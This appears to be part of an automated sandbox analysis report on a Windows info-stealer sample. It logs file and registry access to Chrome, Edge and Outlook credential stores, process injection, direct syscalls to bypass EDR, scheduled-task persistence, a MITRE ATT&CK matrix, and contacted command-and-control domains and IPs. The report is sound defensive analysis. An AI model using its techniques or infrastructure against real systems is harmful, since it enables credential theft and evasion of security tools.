                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeQueries volume information: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000F.00000002.3311044242.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.3313948379.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1092434861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.3315893341.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1094683253.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1094905703.00000000044D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.3313869495.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.3313912525.0000000005FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000F.00000002.3311044242.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.3313948379.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1092434861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.3315893341.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1094683253.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1094905703.00000000044D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.3313869495.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.3313912525.0000000005FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                MITRE ATT&CK Matrix (one row per matrix line; a number in parentheses is the count of matched signatures for that technique, cells without a number were not observed)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Scheduled Task/Job (1) | Scheduled Task/Job (1) | Process Injection (612) | Masquerading (11) | OS Credential Dumping (1) | Security Software Discovery (231) | Remote Services | Email Collection (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | DLL Side-Loading (1) | Scheduled Task/Job (1) | Disable or Modify Tools (11) | LSASS Memory | Process Discovery (2) | Remote Desktop Protocol | Archive Collected Data (1) | Ingress Tool Transfer (3) | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Abuse Elevation Control Mechanism (1) | Virtualization/Sandbox Evasion (51) | Security Account Manager | Virtualization/Sandbox Evasion (51) | SMB/Windows Admin Shares | Data from Local System (1) | Non-Application Layer Protocol (4) | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | DLL Side-Loading (1) | Process Injection (612) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (4) | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Abuse Elevation Control Mechanism (1) | Cached Domain Credentials | System Information Discovery (123) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Obfuscated Files or Information (4) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Software Packing (32) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Timestomp (1) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | DLL Side-Loading (1) | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph
                Behavior Graph ID: 1634632 | Sample: 0t7MXNEfCg.exe | Start date: 11/03/2025 | Architecture: WINDOWS | Score: 100

                Network contacted by the sample (top level):
                • www.031233435.xyz
                • www.publicblockchain.xyz (signature: Performs DNS queries to domains with low reputation)
                • 17 other IPs or domains
                Signatures at top level: Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; Sigma detected: Scheduled temp file as task from temp location; 6 other signatures

                Process tree (indentation shows parent/child; "injected" marks a process entered by code injection rather than started):
                • 0t7MXNEfCg.exe (started)
                  Dropped files: C:\Users\user\AppData\...\HrovwwypYVlFWB.exe (PE32); C:\...\HrovwwypYVlFWB.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp476F.tmp (XML); C:\Users\user\AppData\...\0t7MXNEfCg.exe.log (ASCII)
                  Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Uses schtasks.exe or at.exe to add and modify task schedules; 3 other signatures
                  • RegSvcs.exe (started); signature: Maps a DLL or memory area into another process
                    • nufnwZ9IW.exe (injected); signature: Found direct / indirect Syscall (likely to bypass EDR)
                      • EhStorAuthn.exe (started); signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                        • nufnwZ9IW.exe (injected); signature: Found direct / indirect Syscall (likely to bypass EDR)
                          Network: 031233435.xyz 144.76.229.203 (ports 53464, 53465, 53466) HETZNER-ASDE Germany; an05-prod-v.cdn-ng.net 43.251.56.78 (ports 53468, 53469, 53470) WSN-TW-NET-ASWorldstarNetworkTW Taiwan; Republic of China (ROC); 8 other IPs or domains
                        • firefox.exe (started)
                  • powershell.exe (started); signature: Loading BitLocker PowerShell Module
                    • WmiPrvSE.exe (started)
                    • conhost.exe (started)
                  • powershell.exe (started)
                    • conhost.exe (started)
                  • schtasks.exe (started)
                    • conhost.exe (started)
                • HrovwwypYVlFWB.exe (started); signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Writes to foreign memory regions
                  • schtasks.exe (started)
                    • conhost.exe (started)
                  • RegSvcs.exe (started)
                • svchost.exe (started); network: 127.0.0.1 unknown unknown

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.